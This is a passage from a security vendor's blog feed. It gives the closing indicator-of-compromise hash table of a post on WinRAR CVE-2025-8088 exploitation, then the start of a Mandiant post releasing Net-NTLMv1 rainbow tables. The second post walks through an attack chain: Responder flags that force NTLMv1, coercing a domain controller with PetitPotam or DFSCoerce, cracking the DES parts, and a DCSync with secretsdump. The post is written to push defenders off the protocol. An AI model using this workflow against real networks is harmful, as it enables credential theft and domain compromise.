baseline;">zeroplayer’s continued activity as an upstream supplier of exploits highlights the continued commoditization of the attack lifecycle. By providing ready-to-use capabilities, actors such as zeroplayer reduce the technical complexity and resource demands for threat actors, allowing groups with diverse motivations—from ransomware deployment to state-sponsored intelligence gathering—to leverage a diverse set of capabilities.</span></p> <h3><span style="vertical-align: baseline;">Conclusion</span></h3> <p><span style="vertical-align: baseline;">The widespread and opportunistic exploitation of CVE-2025-8088 by a wide range of threat actors underscores its proven reliability as a commodity initial access vector. It also serves as a stark reminder of the enduring danger posed by n-day vulnerabilities. When a reliable proof of concept for a critical flaw enters the cyber criminal and espionage marketplace, adoption is instantaneous, blurring the line between sophisticated government-backed operations and financially motivated campaigns. This vulnerability’s rapid commoditization reinforces that a successful defense against these threats requires immediate application patching, coupled with a fundamental shift toward detecting the consistent, predictable post-exploitation TTPs.</span></p> <h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h3> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in </span><span style="vertical-align: baseline;">a </span><a href="https://www.virustotal.com/gui/collection/cc3c9b2802c0e9b46ab6bacf8b784b17ffb2c32d2245bc18af4421925cd41d09" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">GTI Collection for registered users</span></a><span style="vertical-align: baseline;">.</span></span></p> <h4><span style="vertical-align: baseline;">File Indicators</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Filename</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">SHA-256</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1_14_5_1472_29.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">272c86c6db95f1ef8b83f672b65e64df16494cae261e1aba1aeb1e59dcb68524</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2_16_9_1087_16.01.2026.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">33580073680016f23bf474e6e62c61bf6a776e561385bfb06788a4713114ba9d</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5_18_6_1405_25.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">498961237cf1c48f1e7764829818c5ba0af24a234c2f29c4420fb80276aec676</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2_13_3_1593_26.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4f4567abe9ff520797b04b04255bbbe07ecdddb594559d436ac53314ec62c1b3</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5_18_6_1028_25.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">53f1b841d323c211c715b8f80d0efb9529440caae921a60340de027052946dd9</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2_12_7_1662_26.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">55b3dc57929d8eacfdadc71d92483eabe4874bf3d0189f861b145705a0f0a8fe</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1_11_4_1742_29.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">68d9020aa9b509a6d018d6d9f4c77e7604a588b2848e05da6a4d9f82d725f91b</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2_18_3_1468_16.01.2026.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">6d3586aa6603f1c1c79d7bd7e0b5c5f0cc8e8a84577c35d21b0f462656c2e1f9</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1_16_2_1428_29.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ae93d9327a91e90bf7744c6ce0eb4affb3acb62a5d1b2dafd645cba9af28d795</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1_12_7_1721_29.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b90ef1d21523eeffbca17181ccccf269bca3840786fcbf5c73218c6e1d6a51a9</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c7726c166e1947fdbf808a50b75ca7400d56fa6fef2a76cefe314848db22c76c</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1_15_7_1850_29.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">e836873479ff558cfb885097e8783356aad1f2d30b69d825b3a71cb7a57cf930</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2_16_2_1526_26.12.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ffc6c3805bbaef2c4003763fd5fac0ebcccf99a1656f10cf7677f6c2a5d16dbd</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">958921ea0995482fb04ea4a50bbdb654f272ab991046a43c1fdbd22da302d544</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">підтверджуючі документи.pdf</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">defe25e400d4925d8a2bb4b1181044d06a8bf61688fd9c9ea59f1e0bb7bc21d8</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Desktop_Internet.lnk</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">edc1f7528ca93ec432daca820f47e08d218b79cceca1ee764966f8f90d6a58bd</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">29f89486bb820d40c9bee8bf70ee8664ea270b16e486af4a53ab703996943256</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2c40e7cf613bf2806ff6e9bc396058fe4f85926493979189dbdbc7d615b7cb14</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">3b85d0261ab2531aba9e2992eb85273be0e26fe61e4592862d8f45d6807ceee4</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">54305c7b95d8105601461bb18de87f1f679d833f15e38a9ee7895a0c8605c0d0</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">5dee69127d501142413fb93fd2af8c8a378682c140c52b48990a5c41f2ce3616</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">867a05d67dd184d544d5513f4f07959a7c2b558197c99cb8139ea797ad9fbece</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">91e61fd77460393a89a8af657d09df6a815465f6ce22f1db8277d58342b32249</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b2b62703a1ef7d9d3376c6b3609cd901cbccdcca80fba940ce8ed3f4e54cdbe6</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cf35ce47b35f1405969f40633fcf35132ca3ccb3fdfded8cc270fc2223049b80</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d981a16b9da1615514a02f5ebb38416a009f5621c0b718214d5b105c9f552389</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ddd67dda5d58c7480152c9f6e8043c3ea7de2e593beedf86b867b83f005bf0cc</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ea0869fa9d5e23bdd16cddfefbbf9c67744598f379be306ff652f910db1ba162</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ef0e1bb2d389ab8b5f15d2f83cf978662e18e31dbe875f39db563e8a019af577</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f3e5667d02f95c001c717dfc5a0e100d2b701be4ec35a3e6875dc276431a7497</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f6761b5341a33188a7a1ca7a904d5866e07b8ddbde9adebdbce4306923cfc60a</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fc2a6138786fae4e33dc343aea2b1a7cd6411187307ea2c82cd96b45f6d1f2a0</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a97f460bfa612f1d406823620d0d25e381f9b980a0497e2775269917a7150f04</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d418f878fa02729b38b5384bcb3216872a968f5d0c9c77609d8c5aacedb07546</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">3-965_26.09.2025.HTA</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ba86b6e0199b8907427364246f049efd67dc4eda0b5078f4bc7607253634cf24</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Заява про скоєння злочину 3-965_26.09.2025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cf8ebfd98da3025dc09d0b3bbeef874d8f9c4d4ba4937719f0a9a3aa04c81beb</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Proposal_for_Cooperation_3415.05092025.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">5b64786ed92545eeac013be9456e1ff03d95073910742e45ff6b88a86e91901b</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">8a7ee2a8e6b3476319a3a0d5846805fd25fa388c7f2215668bc134202ea093fa</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;">N/A</td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">3b47df790abb4eb3ac570b50bf96bb1943d4b46851430ebf3fc36f645061491b</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">document.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">bb4856a66bf7e0de18522e35798c0a8734179c1aab21ed2ad6821aaa99e1cb4c</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">update.bat</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">aea13e5871b683a19a05015ff0369b412b985d47eb67a3af93f44400a026b4b0</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ocean.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ed5b920dad5dcd3f9e55828f82a27211a212839c8942531c288535b92df7f453</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">expl.rar</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a54bcafd9d4ece87fa314d508a68f47b0ec3351c0a270aa2ed3a0e275b9db03c</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BrowserUpdate.lnk</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b53069a380a9dd3dc1c758888d0e50dd43935f16df0f7124c77569375a9f44f5</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div>Tue, 27 Jan 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/<div class="block-paragraph_advanced"><p>Written by: Nic Losby</p> <hr/></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span></h3> <p><span style="vertical-align: baseline;">Mandiant is </span><a href="https://research.google/resources/datasets/?dataset_types=other&amp;search=Net-NTLMv1&amp;" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">publicly releasing</span></a><span style="vertical-align: baseline;"> a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dating back to 1999—Mandiant consultants continue to identify its use in active environments. This legacy protocol leaves organizations vulnerable to trivial credential theft, yet it remains prevalent due to inertia and a lack of demonstrated immediate risk.</span></p> <p><span style="vertical-align: baseline;">By releasing these tables, Mandiant aims to lower the barrier for security professionals to demonstrate the insecurity of Net-NTLMv1. While tools to exploit this protocol have existed for years, they often required uploading sensitive data to third-party services or expensive hardware to brute-force keys. The release of this dataset allows defenders and researchers to recover keys in under 12 hours using consumer hardware costing less than $600 USD. This initiative highlights the amplified impact of combining Mandiant's frontline expertise with Google Cloud's resources to eliminate entire classes of attacks.</span></p> <p><span style="vertical-align: baseline;">This post details the generation of the tables, provides access to the dataset for community use, and outlines critical remediation steps to disable Net-NTLMv1 and prevent authentication coercion attacks.</span></p> <h3><span style="vertical-align: baseline;">Background</span></h3> <p><span style="vertical-align: baseline;">Net-NTLMv1 has been widely known to be insecure since at least 2012, following presentations at DEFCON 20, with cryptanalysis of the underlying protocol </span><a href="https://www.schneier.com/academic/archives/1999/09/cryptanalysis_of_mic_1.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">dating back to at least 1999</span></a><span style="vertical-align: baseline;">. On Aug. 30, 2016, Hashcat </span><a href="https://github.com/hashcat/hashcat/commit/71a8459d851d246945343ea59effa1d46b965bf8" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">added support</span></a><span style="vertical-align: baseline;"> for cracking Data Encryption Standard (DES) keys using known plaintext, further democratizing the ability to attack this protocol. Rainbow tables are almost as old, with the initial paper on rainbow tables published in </span><a href="https://infoscience.epfl.ch/record/99512/files/Oech03.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2003 by Philippe Oechslin</span></a><span style="vertical-align: baseline;">, citing an earlier iteration of a time-memory trade-off from </span><a href="http://www-ee.stanford.edu/~hellman/publications/36.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">1980 by Martin Hellman</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Essentially, if an attacker can obtain a Net-NTLMv1 hash without Extended Session Security (ESS) for the known plaintext of </span><code style="vertical-align: baseline;">1122334455667788</code><span style="vertical-align: baseline;">, a cryptographic attack, referred to as a known plaintext attack (KPA), can be applied. This guarantees recovery of the key material used. Since the key material is the password hash of the authenticating Active Directory (AD) object—user or computer—the attack results can quickly be used to compromise the object, often leading to privilege escalation.</span></p> <p><span style="vertical-align: baseline;">A common chain attackers use is authentication coercion from a highly privileged object, such as a domain controller (DC). Recovering the password hash of the DC machine account allows for DCSync privileges to compromise any other account in AD.</span></p> <h3><span style="vertical-align: baseline;">Dataset Release</span></h3> <p><span style="vertical-align: baseline;">The unsorted dataset can be downloaded using <code>gsutil -m cp -r gs://net-ntlmv1-tables/tables .</code> or through the </span><a href="https://research.google/resources/datasets/?dataset_types=other&amp;search=Net-NTLMv1&amp;" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Cloud Research Dataset portal</span></a><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">The SHA512 hashes of the tables can be checked by first downloading the checksums <code>gsutil -m cp gs://net-ntlmv1-tables/tables.sha512 .</code> then checked by <code>sha512sum -c tables.sha512</code>. </span><span style="vertical-align: baseline;">The password cracking community has already created derivative work and is also hosting the ready to use tables.</span></p> <h3><span style="vertical-align: baseline;">Use of the Tables</span></h3> <p><span style="vertical-align: baseline;">Once a Net-NTLMv1 hash has been obtained, the tables can be used with historical or modern reinventions of rainbow table searching software such as </span><a href="https://www.kali.org/tools/rainbowcrack/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">rainbowcrack (rcrack)</span></a><span style="vertical-align: baseline;">, or </span><a href="https://github.com/inAudible-NG/RainbowCrack-NG" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">RainbowCrack-NG</span></a><span style="vertical-align: baseline;"> on central processing units (CPUs) or a </span><a href="https://github.com/blurbdust/rainbowcrackalack" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">fork</span></a><span style="vertical-align: baseline;"> of </span><a href="https://github.com/jtesta/rainbowcrackalack" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">rainbowcrackalack</span></a><span style="vertical-align: baseline;"> on graphics processing units (GPUs). The Net-NTLMv1 hash needs to be preprocessed to the DES components using </span><a href="https://github.com/evilmog/ntlmv1-multi" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">ntlmv1-multi</span></a><span style="vertical-align: baseline;"> as shown in the next section</span><span style="vertical-align: baseline;">.</span></p> <h3><span style="vertical-align: baseline;">Obtaining a Net-NTLMv1 Hash</span></h3> <p><span style="vertical-align: baseline;">Most attackers will use </span><a href="https://github.com/lgandx/Responder" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Responder</span></a><span style="vertical-align: baseline;"> with the <code>--lm</code> and <code>--disable-ess</code> flags and set the authentication to a static value of <code>1122334455667788</code> to only allow for connections with Net-NTLMv1 as a possibility. Attackers can then wait for incoming connections or coerce authentication using a tool such as </span><a href="https://github.com/topotam/PetitPotam" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">PetitPotam</span></a><span style="vertical-align: baseline;"> or </span><a href="https://github.com/Wh04m1001/DFSCoerce" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DFSCoerce</span></a><span style="vertical-align: baseline;"> to generate incoming connections from DCs or lower privilege hosts that are useful for objective completion. Responses can be cracked to retrieve password hashes of either users or computer machine accounts. A sample workflow for an attacker is shown below in Figure 1, Figure 2, and Figure 3.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig1.max-1000x1000.png" alt="DFSCoerce against a DC"> </a> <figcaption class="article-image__caption "><p data-block-key="3l9yc">Figure 1: DFSCoerce against a DC</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig2.max-1000x1000.png" alt="Net-NTLMv1 hash obtained for DC machine account"> </a> <figcaption class="article-image__caption "><p data-block-key="3l9yc">Figure 2: Net-NTLMv1 hash obtained for DC machine account</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig3.max-1000x1000.png" alt="Parse Net-NTLMv1 hash to DES parts"> </a> <figcaption class="article-image__caption "><p data-block-key="3l9yc">Figure 3: Parse Net-NTLMv1 hash to DES parts</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Figure 4 illustrates the processing of the Net-NTLMv1 hash to the DES ciphertexts.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig4.max-1000x1000.png" alt="Net-NTLMv1 hash to DES ciphertexts"> </a> <figcaption class="article-image__caption "><p data-block-key="3l9yc">Figure 4: Net-NTLMv1 hash to DES ciphertexts</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">An attacker then takes the split-out ciphertexts to crack the keys used based on the known plaintext of <code>1122334455667788</code> with the steps of loading the tables shown in Figure 5 and cracking results in Figure 6 and Figure 7.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig5.max-1000x1000.png" alt="Loading DES components for cracking"> </a> <figcaption class="article-image__caption "><p data-block-key="yk6tm">Figure 5: Loading DES components for cracking</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig6.max-1000x1000.png" alt="First hash cracked"> </a> <figcaption class="article-image__caption "><p data-block-key="yk6tm">Figure 6: First hash cracked</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig7.max-1000x1000.png" alt="Second hash cracked and run statistics"> </a> <figcaption class="article-image__caption "><p data-block-key="yk6tm">Figure 7: Second hash cracked and run statistics</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">An attacker can then calculate the last remaining key with ntlmv1-multi once again, or look it up with </span><a href="https://github.com/sensepost/assless-chaps" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">twobytes</span></a><span style="vertical-align: baseline;">, to recreate the full NT hash for the DC account with the last key part shown in Figure 8.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig8.max-1000x1000.png" alt="Calculate remaining key"> </a> <figcaption class="article-image__caption "><p data-block-key="b71de">Figure 8: Calculate remaining key</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The result can be checked with hashcat's </span><a href="https://github.com/hashcat/hashcat/pull/2607" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">NT hash shucking mode</span></a><span style="vertical-align: baseline;">, <code>-m 27000</code>, as shown in Figure 9.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig9.max-1000x1000.png" alt="Keys checked with hash shucking"> </a> <figcaption class="article-image__caption "><p data-block-key="b71de">Figure 9: Keys checked with hash shucking</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">An attacker can then use the hash to perform a </span><a href="http://attack.mitre.org/techniques/T1003/006/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DCSync attack</span></a><span style="vertical-align: baseline;"> targeting a DC and authenticating as the now compromised machine account. The attack flow uses </span><a href="https://github.com/fortra/impacket/blob/master/examples/secretsdump.py" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">secretsdump.py</span></a><span style="vertical-align: baseline;"> from the </span><a href="https://github.com/fortra/impacket" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: 